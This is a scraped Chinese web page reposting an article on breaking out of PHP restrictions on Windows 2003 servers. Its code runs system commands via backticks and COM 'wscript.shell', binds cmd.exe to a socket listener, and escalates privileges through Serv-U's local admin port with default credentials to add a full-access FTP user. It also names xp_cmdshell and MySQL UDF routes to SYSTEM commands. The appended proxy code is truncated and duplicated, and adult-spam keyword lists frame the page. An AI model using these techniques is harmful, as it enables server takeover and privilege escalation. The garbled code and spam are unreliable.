亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > OS > Win2003 > 正文

突破Windows 2003 PHP服務器的新思路

2024-09-10 16:50:32
字體:
來源:轉載
供稿:網友


收集最實用的網頁特效代碼!

  從win2000到win xp, 再到win2003, ms iis性的提高是顯而易見的。 在win2000中, 一個普通的php shell便能把它打垮; 在win xp, 即使safe mode = off,你也無法用system() 等函數執行系統命令, 但是我們還能用com()函數進行突破;到win 2003,即使iis 和php都是默認安裝,你用system(), com()也可能拿它沒轍。這時候你就不得不使用一些新的方法來進行突破了。
 
  1、disable_functions的突破

  在php -4.0.1以上的版本,php.ini里引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執行這些函數的時候將會提示warning: system() has been disabled for security reasons,同時程序終止運行。但是也不是沒有辦法執行系統命令了。因為php采用了很多perl的特性,比如還可以用(`)來執行命令,示例代碼如下:

  <?$output = `ls -al`;echo "<pre>$output</pre>";?>

  據說這個只有設成safe_mode為on才能避免,但上次我在一臺國外的服務器上使用的時候還是失敗了,人并不是什么時候都能那么走運的:)

  2、dl()函數的應用

  當任何php的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用于safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調用w32api 函數,可惜這個擴展已被移動到 pecl 庫中,且自php 5.1.0以下版本起不再被綁定。以下是手冊里的例子:

  // 加載此擴展

  dl("php_w32api.dll");

  // 注冊 gettickcount 函數,來自 kernel32.dll

  w32api_register_function("kernel32.dll",

  "gettickcount",

  "long");

  // 注冊 messageboxa 函數,來自 user32.dll

  w32api_register_function("user32.dll",

  "messageboxa",

  "long");

  // 取得開機時間信息

  $ticks = gettickcount();

  // 轉換為易于理解的文本

  $secs = floor($ticks / 1000);

  $mins = floor($secs / 60);

  $hours = floor($mins / 60);

  $str = sprintf("you have been using your computer for:".

  "/r/n %d milliseconds, or /r/n %d seconds".

  "or /r/n %d mins or/r/n %d hours %d mins.",

  $ticks,

  $secs,

  $mins,

  $hours,

  $mins - ($hours*60));

  // 顯示一個消息對話框,只有一個 ok 按鈕和上面的開機時間文本

  messageboxa(null,

  $str,

  "uptime information",

  mb_ok);

  ?>

  可惜我還沒有理解透徹dl()和w32api, 所以就不亂舉例子了, 免得誤導讀者。

  3、com 和 .net(windows)函數的應用

  com(component object model,組件對象模型)是微軟開發的軟件規范,它用于開發面向對象的、編譯好的軟件組件,它允許把軟件抽象成為二進制的部件,主要運用于windows平臺。

  php 的 windows 版本已經內置該擴展模塊的支持。無需加載任何附加擴展庫即可使用com函數。它的使用方法類似于c++或java中類的創建的語法,并把com的類名作為參數傳遞到構造函數。例如使用在php中調用“wscript.shell”執行系統命令:

  $cmd=” e:/cert/admin/psexec.exe”;

  if($com=new com("wscript.shell")) echo "yes";

  if(!$cmd1=$com->exec($cmd))

  {

  echo "can not exec()";

  }

  if(!$cmd2=$cmd1->stdout())

  {

  echo "can not stdout()";

  }

  if(!$cmd3=$cmd2->readall())

  {

  echo "can not readall()";

  }

  echo $cmd3;

  ?>

  圖1是我寫的一個執行psexec.exe的一個例子。

  這段代碼與asp的的意思是一模一樣的,當然,你也可以像asp那樣調用“adodb.connection”,利用這個組件結合jet2溢出漏洞,可能能夠在php saft mode=on下拿到一個shell。

  //create the database connection

  $conn = new com("adodb.connection");

  $dsn = "driver={microsoft access driver (*.mdb)}; dbq=" . realpath("mydb.mdb");

  $conn->open($dsn);

  //pull the data through sql string

  $rs = $conn->execute("select clients from web");

  …..

  ?>

  .net 函數只能運行在 php 5上,當然,它需要 “.net runtime”的支持,而且這的php的一個實驗性模塊,功能還未齊全,所以在這就不討論了。

  4、java()函數的應用

  該方法適用于safe mode=on。要使用java模塊服務器必須事先安裝java虛擬機,而且在php安裝配置的時候打開了with-java的選項,代碼如下:

  [java]

  ;這是到php_java.jar的路徑

  ;java.class.path = ./php_java.jar

  ;jdk的路徑

  ;java.home = f:/jdk1.3.0

  ;到虛擬機的路徑

  ;java.library=f:/jdk1.3.0/jre/bin/hostspot/jvm.dll

  同com一樣,使用java創建類(不僅僅是javabeans)只需把java的類名作為參數傳遞到構造函數。以下是手冊里邊的一個例子:

  // this example is only intended to be run as a cgi.

  $frame = new java('java.awt.frame', 'php');

  $button = new java('java.awt.button', 'hello java world!');

  $frame->add('north', $button);

  $frame->validate();

  $frame->pack();

  $frame->visible = true;

  $thread = new java('java.lang.thread');

  $thread->sleep(10000);

  $frame->dispose();

  ?>

  可惜能真正支持java的php服務器并不多見,所以在這也不多討論了。

  5、socket()函數的應用

  socket 是php中功能極為強大的一個模塊,如果你使用高級的、抽象的接口(由fsockopen()和psockopen函數打開的socket),是不需要打開“php_sockets.dll”的。但是如果要使用完整的socket函數塊,就必須在php.ini這樣設置:

  ;windows extensions

  ;note that mysql and odbc support is now built in, so no dll is needed for it.

  ……..

  ;去掉以下一句最前邊的分號

  ;extension=php_sockets.dll

  使用php的socket函數塊可以實現端口轉發/重定向、數據包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 還可以用它構造tcp/udp服務器, 同時, 我覺得它也是突破策略的一個最好的辦法。以下便是一個在服務器上打開端口構造tcp服務器的例子,你可以用它來捆綁上服務器的cmd.exe:

  //在服務器上構造tcp服務

  //該例子需要php_sockets.dll的支持

  //執行后便可使用” telnet 127.0.0.1 1020”連接

  error_reporting(e_all);

  /* allow the script to hang around waiting for connections. */

  set_time_limit(0);

  /* turn on implicit output flushing so we see what we're getting

  * as it comes in. */

  ob_implicit_flush();

  //在服務器上綁定ip和端口

  $address = '127.0.0.1';

  $port = 1020;

  if (($sock = socket_create(af_inet, sock_stream, sol_tcp)) < 0) {

  echo "socket_create() failed: reason: " . socket_strerror($sock) . "/n";

  }

  if (($ret = socket_bind($sock, $address, $port)) < 0) {

  echo "socket_bind() failed: reason: " . socket_strerror($ret) . "/n";

  }

  if (($ret = socket_listen($sock, 5)) < 0) {

  echo "socket_listen() failed: reason: " . socket_strerror($ret) . "/n";

  }

  do {

  if (($msgsock = socket_accept($sock)) < 0) {

  echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "/n";

  break;

  }

  /* send instructions. */

  $msg = "/nwelcome to the php test server. /n" .

  "to quit, type 'quit'. to shut down the server type 'shutdown'./n";

  socket_write($msgsock, $msg, strlen($msg));

  do {

  if (false === socket_recv($msgsock, $buf , 1024, 0)) {

  echo "socket_read() failed: reason: " . socket_strerror($ret) . "/n";

  break 2;

  }

  if (!$buf = trim($buf)) {

  continue;

  }

  if ($buf == 'quit') {

  break;

  }

  if ($buf == 'shutdown') {

  socket_close($msgsock);

  break 2;

  }

  $talkback = "php: you said '$buf'./n";

  socket_write($msgsock, $talkback, strlen($talkback));

  echo "$buf/n";

  //以下處理接受到的buf

  /*eg:例如

  $buf=”cmd.exe /c netstat –an”;

  $pp = popen('$buf ', 'r');

  while($read = fgets($pp, 2096))

  echo $read;

  pclose($pp);

  */

  } while (true);

  socket_close($msgsock);

  } while (true);

  socket_close($sock);

  ?>

  事實上,很多主機都是沒有加載php_sockets.dll的,慶幸的是,不需要socket模塊支持的“fsockopen”函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀寫本機中未對外部開放的端口。使用fsockopen讀寫serv-u 的本地管理端口43958 (注: 該端口無法在外部連結) 進行提權便是一個很典型的例子:

  $adminuser=” localadministrator”;

  $adminpass=” #[email protected]$ak#.lk;[email protected]”;

  $adminport=” 43958”;

  $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);

  if (!$fp) {

  echo "$errstr ($errno)

  /n";

  } else {

  //可以寫入$shellcode

  // fputs ($fp, $shellcode);

  fputs ($fp, "user ".$adminuser."/r/n");

  sleep (1);

  fputs ($fp, "pass ".$adminpass."/r/n");

  sleep (1);

  fputs ($fp, "site maintenance/r/n");

  sleep (1);

  fputs ($fp, "-setusersetup/r/n");

  fputs ($fp, "-ip=".$addr."/r/n");

  fputs ($fp, "-portno=".$ftpport."/r/n");

  fputs ($fp, "-user=".$user."/r/n");

  fputs ($fp, "-password=".$password."/r/n");

  fputs ($fp, "-homedir=".$homedir."/r/n");

  fputs ($fp, "-loginmesfile=/r/n");

  fputs ($fp, "-disable=0/r/n");

  fputs ($fp, "-relpaths=0/r/n");

  fputs ($fp, "-needsecure=0/r/n");

  fputs ($fp, "-hidehidden=0/r/n");

  fputs ($fp, "-alwaysallowlogin=0/r/n");

  fputs ($fp, "-changepassword=1/r/n");

  fputs ($fp, "-quotaenable=0/r/n");

  fputs ($fp, "-maxusersloginperip=-1/r/n");

  fputs ($fp, "-speedlimitup=-1/r/n");

  fputs ($fp, "-speedlimitdown=-1/r/n");

  fputs ($fp, "-maxnrusers=-1/r/n");

  fputs ($fp, "-idletimeout=600/r/n");

  fputs ($fp, "-sessiontimeout=-1/r/n");

  fputs ($fp, "-expire=0/r/n");

  fputs ($fp, "-ratioup=1/r/n");

  fputs ($fp, "-ratiodown=1/r/n");

  fputs ($fp, "-ratioscredit=0/r/n");

  fputs ($fp, "-quotacurrent=0/r/n");

  fputs ($fp, "-quotamaximum=0/r/n");

  fputs ($fp, "-maintenance=system/r/n");

  fputs ($fp, "-passwordtype=regular/r/n");

  fputs ($fp, "-ratios=none/r/n");

  fputs ($fp, " access=".$homedir."|rwamelcdp/r/n");

  fputs ($fp, "quit/r/n");

  sleep (1);

  while (!feof($fp)) {

  echo fgets ($fp,128);

  }

  }

  ?>

  還可以利用fsockopen編寫http代理,從而訪問外網或本機中無法外部訪問的網站。我手上有一個完整的httpproxy(圖4),代碼較長。有興趣的讀者可以看看。

  6、mysql/mssql接口

  不同于linux的是,windows下的mysql/mssql一般是以系統管理員身份運行的,因此,只要能拿到本機sql數據庫中的root/sa密碼,你就可以直接用php連接數據庫來執行系統命令。

  在mysql中執行系統命令要利用用戶自定義函數“mysql udf dynamic library”這個漏洞。在mssql中只要連接上數據庫,就能直接調用“master..xp_cmdshell“擴展執行命令,權限當然是system權限。

  總結一下:由于系統、iis、php的版本不一樣,以上提到的幾個突破方法可能會有所變化,php還有許多擴展功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全策略的限制!

  后面附上proxy.php的代碼

  error_reporting(e_all);

  /*

  // this program is free software; you can redistribute it and/or

  // modify it under the terms of the gnu general public license

  // as published by the free software foundation; either version 2

  // of the license, or (at your option) any later version.

  //

  // this program is distributed in the hope that it will be useful,

  // but without any warranty; without even the implied warranty of

  // merchantability or fitness for a particular purpose. see the

  // gnu general public license for more details.

  //

  // you should have received a copy of the gnu general public license

  // along with this program; if not, write to the free software

  // foundation, inc., 59 temple place - suite 330, boston, ma 02111-1307, usa.

  //-------------------------------------------------------------------

  // class: phproxy

  // author: ultimategamer00 (abdullah a.)

  // last modified: 6:28 pm 6/22/2004

  */

  function __stripslashes($str)

  {

  return get_magic_quotes_gpc() ? stripslashes($str) : $str;

  }

  if (!function_exists('str_rot13'))

  {

  function str_rot13($str)

  {

  static $alpha = array('abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz',

  'nopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklm');

  return strtr($str, $alpha[0], $alpha[1]);

  }

  }

  class phproxy

  {

  var $allowed_hosts = array();

  var $version;

  var $script_url;

  var $url;

  var $url_segments;

  var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);

  var $socket;

  var $content_type;

  var $request_headers;

  var $post_body;

  var $response_headers;

  var $response_body;

  function phproxy($flags = 'previous')

  {

  $this->version = '0.2';

  $this->script_url = 'http'

  . (isset(

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0/r/n";

  $headers .= "host: :/r/n";

  $headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)/r/n";

  $headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1/r/n";

  $headers .= "connection: close/r/n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "referer: /r/n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "cookie: $cookies/r/n" : '';

  if (

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0/r/n";

  $headers .= "host: :/r/n";

  $headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)/r/n";

  $headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1/r/n";

  $headers .= "connection: close/r/n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "referer: /r/n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "cookie: $cookies/r/n" : '';

  if (

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
日日狠狠久久偷偷四色综合免费| 午夜精品视频在线| 97久久精品国产| 欧美视频中文在线看| 中文字幕精品久久久久| 亚洲欧洲一区二区三区久久| 日韩精品中文字幕在线播放| 午夜精品久久久久久久99热浪潮| 精品成人乱色一区二区| 久久久久久久久中文字幕| www国产精品视频| 欧美电影在线观看高清| 538国产精品视频一区二区| 国产精品美女久久久久av超清| 日韩av电影手机在线观看| 中文字幕精品一区久久久久| 精品国产一区二区三区在线观看| 亚洲精品456在线播放狼人| 热99在线视频| 98精品国产高清在线xxxx天堂| 日韩欧美国产黄色| 日韩av在线网页| 欧美在线视频一区| 欧美中文字幕视频| 欧美激情喷水视频| 久久久www成人免费精品| 91久久久久久久久| 国产丝袜视频一区| 91在线直播亚洲| 色哟哟网站入口亚洲精品| 午夜精品福利电影| 亚洲国产精品999| 日韩美女中文字幕| 国产精品视频yy9099| 18久久久久久| 欧亚精品中文字幕| 久久久久久久影视| 中文字幕日韩精品在线观看| 精品丝袜一区二区三区| 在线视频日本亚洲性| 中文字幕日韩有码| 欧美在线视频一区二区| 亚洲精品不卡在线| 久久夜精品va视频免费观看| 欧美另类在线播放| 中文字幕精品影院| 一区二区三区视频在线| 国产成人精品免费久久久久| 久久精品免费电影| 国产精品r级在线| 成人激情在线播放| 久久影视免费观看| 亚洲福利精品在线| 欧美激情成人在线视频| 成人激情电影一区二区| 国产成人在线亚洲欧美| 亚洲性夜色噜噜噜7777| 人妖精品videosex性欧美| 欧洲亚洲女同hd| 日韩精品中文字幕久久臀| 亚洲精品av在线播放| 一区二区三区视频免费在线观看| 亚洲精品国产美女| 欧美日本高清视频| 国产精品成人v| 欧美成人精品在线观看| 日韩成人小视频| 欧美日韩精品在线观看| 亚洲精品www久久久| 国产精品r级在线| 国产精品扒开腿做爽爽爽视频| 精品国产自在精品国产浪潮| 欧美极品少妇xxxxⅹ裸体艺术| 亚洲国产精久久久久久| 亚洲国产精品专区久久| 亚洲一区二区久久| 亚洲欧美国产精品va在线观看| 91精品国产综合久久久久久久久| 亚洲精品一二区| 亚洲欧美一区二区精品久久久| 精品一区二区三区四区在线| 91影视免费在线观看| 亚洲国产精品资源| 日韩美女av在线免费观看| 成人免费大片黄在线播放| 欧美日韩在线视频一区二区| 国产精品∨欧美精品v日韩精品| 奇米成人av国产一区二区三区| 欧美视频在线免费看| 精品久久香蕉国产线看观看gif| 国产精品欧美久久久| 亚洲欧美另类中文字幕| 亚洲成人黄色网| 国产自摸综合网| 国产偷亚洲偷欧美偷精品| 久久国产精品偷| 亚洲毛片在线看| 欧美日韩中文字幕在线| 综合国产在线观看| 欧美在线视频免费观看| 精品国产视频在线| 57pao成人国产永久免费| 在线观看欧美成人| 国产成人在线一区| 亚洲综合在线中文字幕| 亚洲精选在线观看| 欧洲美女7788成人免费视频| 亚洲第一中文字幕| 欧美日韩午夜视频在线观看| 欧洲成人午夜免费大片| 亚洲无线码在线一区观看| 国产欧美日韩亚洲精品| www.欧美免费| 亚洲欧美激情精品一区二区| 美女黄色丝袜一区| 亚洲一区二区三区乱码aⅴ蜜桃女| 久久精品免费电影| 日韩激情在线视频| 欧美大片免费看| 欧美性生活大片免费观看网址| 欧美激情伊人电影| 欧美激情精品久久久久久蜜臀| 欧美激情在线观看| 日韩在线观看网站| 亚洲欧美国产va在线影院| 国产一区二区三区久久精品| 日韩美女写真福利在线观看| 精品久久久久久久中文字幕| 欧美刺激性大交免费视频| 国内揄拍国内精品| 中文字幕亚洲专区| 国产黑人绿帽在线第一区| 中文字幕日本欧美| 97免费视频在线| 久久久久国产视频| 青草青草久热精品视频在线网站| 国产69精品久久久久9| 欧美—级a级欧美特级ar全黄| 欧美性感美女h网站在线观看免费| 懂色av影视一区二区三区| 欧美一级免费看| 日韩中文在线中文网在线观看| 国产精品稀缺呦系列在线| 亚洲精选在线观看| 久久久久在线观看| 国产一区二区三区高清在线观看| 国产精品久久久久久久av电影| 国产成人激情视频| 18性欧美xxxⅹ性满足| 亚洲色图25p| 69影院欧美专区视频| 日韩中文字幕视频在线| 国产精品中文在线| 欧美成人激情视频免费观看| 国产福利精品在线| 久久久久这里只有精品| 欧美影院成年免费版| 欧美大人香蕉在线| 欧美亚洲国产视频| 欧美色视频日本高清在线观看| 国产亚洲欧美日韩美女| 国产精品国产三级国产专播精品人| 丰满岳妇乱一区二区三区| 91av在线免费观看视频|